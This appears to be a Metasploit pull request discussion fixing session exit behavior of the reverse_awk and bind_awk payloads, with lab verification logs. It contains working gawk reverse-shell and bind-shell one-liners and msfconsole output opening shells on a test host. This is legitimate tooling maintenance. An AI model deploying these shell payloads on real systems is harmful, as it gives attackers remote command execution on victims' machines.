Fix #14510, fix reverse_awk and bind_awk exit behavior

[timwr]

This fixes #14510
Thanks for reporting @egypt !

Verification

• use payload/cmd/unix/reverse_awk
• generate -f raw
• copy the command
• to_handler
• paste the command into a terminal somewhere
• interact with the session: sessions -1
• id or something to make sure it's real
• exit or ctrl-c
• see the session close
• repeat for payload/cmd/unix/reverse_awk

Expected behavior

clean exit

Current behavior

If you exit, the payload continues to call back. If you ctrl-c, it doesn't call back anymore but the process is still there.

[bcoles]

Works as described on Kali without reintroducing the issues described in #9750. (Edit: I only tested bind, not reverse)

The payload fails to run on Ubuntu 20.04:

$ awk 'BEGIN{s="/inet/tcp/4444/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
awk: 1: unexpected character '&'
awk: 1: unexpected character '&'
awk: line 1: syntax error at or near close
awk: line 1: syntax error at or near }

However it didn't work prior to this change either, presumably due to shipping mawk rather than gawk :

$ awk 'BEGIN{s="/inet/tcp/4444/0/0";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
awk: 1: unexpected character '&'
awk: 1: unexpected character '&'

Ubuntu 20.04:

$ awk -W version
mawk 1.3.4 20200120
Copyright 2008-2019,2020, Thomas E. Dickey
Copyright 1991-1996,2014, Michael D. Brennan

random-funcs:       srandom/random
regex-funcs:        internal
compiled limits:
sprintf buffer      8192
maximum-integer     2147483647

Kali:

# awk -W version
GNU Awk 5.0.1, API: 2.0 (GNU MPFR 4.1.0, GNU MP 6.2.0)
Copyright (C) 1989, 1991-2019 Free Software Foundation.

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses/.

[egypt]

That makes sense. The TCP stack is a GNU extension. I wonder how much portability we would lose by changing the invocation to gawk instead.

[cdelafuente-r7]

Thanks @timwr for fixing this! Everything looks good to me.
I was able to reproduce the issue from master and confirmed these changes fixed it. I tested both payloads and verified that the session closes correctly and the awk command terminates with both exit and Ctrl-C on the target. I'll go ahead and land it.

Example output

msf6 > use payload/cmd/unix/reverse_awk
msf6 payload(cmd/unix/reverse_awk) > set LHOST 192.168.144.1
LHOST => 192.168.144.1
msf6 payload(cmd/unix/reverse_awk) > generate -f raw
awk 'BEGIN{s="/inet/tcp/0/192.168.144.1/4444";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
msf6 payload(cmd/unix/reverse_awk) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.144.1:4444
msf6 payload(cmd/unix/reverse_awk) > [*] Command shell session 1 opened (192.168.144.1:4444 -> 192.168.144.129:36511) at 2021-01-08 14:27:08 +0100

msf6 payload(cmd/unix/reverse_awk) > sessions -1
[*] Starting interaction with 1...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.144.129 - Command shell session 1 closed.
msf6 payload(cmd/unix/reverse_awk) >
msf6 payload(cmd/unix/reverse_awk) > [*] Command shell session 2 opened (192.168.144.1:4444 -> 192.168.144.129:35361) at 2021-01-08 14:27:30 +0100

msf6 payload(cmd/unix/reverse_awk) > sessions -1
[*] Starting interaction with 2...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

[*] 192.168.144.129 - Command shell session 2 closed.  Reason: User exit
msf6 payload(cmd/unix/reverse_awk) > use payload/cmd/unix/bind_awk
msf6 payload(cmd/unix/bind_awk) > set RHOST 192.168.144.129
RHOST => 192.168.144.129
msf6 payload(cmd/unix/bind_awk) > generate -f raw
awk 'BEGIN{s="/inet/tcp/4444/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
msf6 payload(cmd/unix/bind_awk) > jobs -K
Stopping all jobs...
msf6 payload(cmd/unix/bind_awk) > to_handler
[*] Payload Handler Started as Job 1

[*] Started bind TCP handler against 192.168.144.129:4444
msf6 payload(cmd/unix/bind_awk) > [*] Command shell session 3 opened (0.0.0.0:0 -> 192.168.144.129:4444) at 2021-01-08 14:28:39 +0100

msf6 payload(cmd/unix/bind_awk) > sessions -1
[*] Starting interaction with 3...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.144.129 - Command shell session 3 closed.
msf6 payload(cmd/unix/bind_awk) > jobs -K
Stopping all jobs...
msf6 payload(cmd/unix/bind_awk) > to_handler
[*] Payload Handler Started as Job 2

[*] Started bind TCP handler against 192.168.144.129:4444
msf6 payload(cmd/unix/bind_awk) > [*] Command shell session 4 opened (0.0.0.0:0 -> 192.168.144.129:4444) at 2021-01-08 14:29:23 +0100

msf6 payload(cmd/unix/bind_awk) > sessions -1
[*] Starting interaction with 4...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 4? [y/N]  y

[*] 192.168.144.129 - Command shell session 4 closed.  Reason: User exit

[cdelafuente-r7]

Release Notes

Fixed an issue with both cmd/unix/reverse_awk and cmd/unix/bind_awk payloads which were not correctly terminating after a session was closed. This was causing endless session creations and high CPU consumption on the target.